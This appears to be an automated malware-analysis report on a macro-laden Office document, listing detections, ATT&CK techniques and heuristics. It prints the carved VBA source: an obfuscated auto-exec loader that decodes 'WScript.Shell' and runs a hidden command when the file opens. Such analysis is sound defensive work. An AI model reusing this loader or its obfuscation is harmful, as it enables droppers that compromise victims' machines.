Verdict: MALICIOUS
Risk Score: 364

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
This document contains obfuscated VBA macros designed to execute automatically upon opening, as indicated by multiple high-severity heuristic firings including 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The embedded URL within the document body is used as a lure to enable macros, a common tactic for malware droppers. The script likely attempts to download and execute a second-stage payload.
Heuristics (11)

- ClamAV: Xls.Malware.Valyria-6700358-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://newhorizons.com.sg/wp-content/uploads/2015/12/Microsoft_Word_2013_logo.svg_-600x600.png (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3951 bytes |

SHA-256: b1e1538042cda0d2c9d8fcf55cfd325a5c0e9bae12b0e582f978f880bc12941e

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 12 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub Q_TBV()
Dim W_YL As Object: Set W_YL = VBA.CreateObject(O_VR("706C7C8B82898D476C817E8585"))
Dim Y_C As String
Y_C = "58588C585858478D543058698551585868585847585857582758583A58592A2E583C585858443122474289251A5858588B1E3828589558588D582658581F5858615E58635858952E582A2D911B583743585824585864748F24585E7524584C3C587C58682A58583058"
Dim NM_PZ As String
NM_PZ = "585858802B58585845585828585887574F583823685858585831693F586B5864582858586B58411E1F414B6C587F5886898858588F89684258584C1E1F6A8A582B785E586E8D58635858876326818E5858584858587042587758193A5858226C5D41583228277F581A"
Dim R_DE As String
R_DE = "1E35936D6A695858582F585851455858915858801C2E4958588358584E79586A26672258585877385889978458587C5858581E8D58317E3D589431583C58584E58377591583E214860285858674595742C6081582B58585858584E5858582B584E5858202C5858585D"
Dim PT_IX As String
PT_IX = "6E21588B61685880285833583C4B438B58285858645858263183586D196B5858587758428B5858584B5891582B58585898585894582324217E4958582C286058246E5857613A8724587B785858761F58215858855886376C583A2688195838584A675858587F657690"
Dim QN_S As String
QN_S = "58586658583C204323586D5858584F5876402D5823585B586D58586139588B3C58585874581E5E583258676E961F5853213D6291586623414A586758585A588358582E7E581B4227582D97904D58325858586658952A53584289587D25585858885858397C1E585358"
Dim G_B As String
G_B = "5858584B8C58371D5858588358586E58706E215858695858BB58586B585873854C585858355E21496E6B1E582E5826455A5882583F1C5858585895582B5A588785585854291990525858583B8E822A586C585F48586C315C58372C79713A582D5D6258587258585832"
Dim L_QBE As String
L_QBE = "5844722458494F715841555858585F92723F584A581E264A38582B5858587E5B52353188958E5843586198587E58582B4C6F582358503E6558583C7758586E58585858585B8B4A96584F587D587A58585958516A58583C5858581F58875819587D7258544F8B7A5858"
Dim N_ZKZ As String
N_ZKZ = "58582E263D58588F276A2E7D1D585874581C845827584E1C196B58585858795858436C2658585F5D437858587D785858589377453E582058233D584B589258585882915858584A583F7F585863585858583D586C1B8C8E9865465858582B7858314F58585665582D61"
Dim G_Y As String
G_Y = "581F58582458845822585858495869585866925458342D2058582C585877755B582479865858595838375858584058691B5D58805858584B41588658447D313D6A58558E255835895858685858585858327658586B5894586A312C585F58776C28584C86585858611B"
Dim AJL_DGG As String
AJL_DGG = "81805847585849585864589080563D58588443584358584E74595863826E2923582C58585837582E73585858581E58585858693683568558585898665F7D4C53586D587D2258932D56584A585C5854735882585858865844585889582C455858433358585F581E5821"
Dim S_M As String
S_M = "4558544A58585D58585894584B979258304323654387585D31585890718C5858585A4B5855584458854A1B2769584A82585858581B4D58588D589467585858585864582D5858905855584F58722758585836415858685858318B7336582195725858581C54585D5D58"
Dim VKF_N As String
VKF_N = "2158585879865858538C5866528B555885365858585887588C463F58584958581E6058585A2A585821585C58583558583F587F91587F4858588B7A585C5861588A5E73493558C9587C58235858586F5858587C2A3C582A6E2F6D586858586E883F585858586558582B58"
W_YL.Exec (O_VR(ActiveDocument.Variables("556D9").Value))
End Sub
Public Sub Auto_Open()
Application.Run O_VR("67605A786E5C6F72735D635A6B")
End Sub
Sub Workbook_Open()
Application.Run "ThisWorkbook." & O_VR("67605A786E5C6F72735D635A6B")
End Sub
Public Function O_VR(ByVal W_YL As String)
Dim V_T As String
Dim VTO_P As Long
For VTO_P = 1 To Len(W_YL) Step 2
V_T = V_T & Chr(Asc(Chr("&H" & Mid(W_YL, VTO_P, 2))) - 25)
Next
O_VR = V_T
End Function
Sub NGA_UCVYZDJAR()
Q_TBV
End Sub
Public Sub Document_Open()
Application.Run O_VR("67605A786E5C6F72735D635A6B")
End Sub
```